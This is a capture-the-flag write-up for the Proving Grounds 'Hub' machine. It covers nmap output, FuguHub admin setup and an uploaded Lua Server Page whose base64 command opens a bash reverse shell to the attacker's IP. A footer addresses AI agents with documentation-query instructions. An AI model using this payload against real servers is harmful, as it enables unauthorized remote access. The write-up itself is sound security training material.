# Proving grounds Practice: Hub

Proving grounds Practice - Hub CTF writeup.

### Nmap

```sh
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp   open  http     nginx 1.18.0
8082/tcp open  http     Barracuda Embedded Web Server
| http-methods: 
|   Supported Methods: OPTIONS GET HEAD PROPFIND PATCH POST PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
|_  Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
|   Server Date: Fri, 18 Aug 2023 04:51:55 GMT
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK
|_  WebDAV type: Unknown
|_http-title: Home
|_http-favicon: Unknown favicon MD5: FDF624762222B41E2767954032B6F1FF
|_http-server-header: BarracudaServer.com (Posix)
9999/tcp open  ssl/http Barracuda Embedded Web Server
|_http-title: Home
| http-webdav-scan: 
|   Server Type: BarracudaServer.com (Posix)
```

### Web

![img](/files/O3ebwEmeymAwtFltxUfO)

Fuguhub is vulnerable to [Remote Code Execution](https://github.com/ojan2021/Fuguhub-8.1-RCE)

**Set administrative account**

![img](/files/t3rsEXhuqNoaamMwJpEK)

**Login to the admin account**

![img](/files/g37oaxCctmGtQEJZvkAb)

* Direct to the Web file manager.
* Click upload file and upload below script.

### Remote Code Execution Exploit

```lsp
<div style="margin-left:auto;margin-right: auto;width: 350px;">

<div id="info">
<h2>Lua Server Pages Reverse Shell</h2>
<p>Delightful, isn't it?</p>
</div>

<?lsp if request:method() == "GET" then ?>
   <?lsp os.execute("echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xODcvMTIzNCAwPiYx | base64 -d | bash") ?>
<?lsp else ?>
   You sent a <?lsp=request:method()?> request
<?lsp end ?>

</div>
```

* Change the IP address and PORT in the base64 encoded value and save file as `.lsp`.
* Upload the file to file server and visit the uploaded file to trigger the reverse shell.

![img](/files/rQatKcaSrmVV1y8GqdsX)

![img](/files/BV417TlFTPXdxL8zKOmz)

Root Obtained.

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-08-18-proving_grounds_practice-hub.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.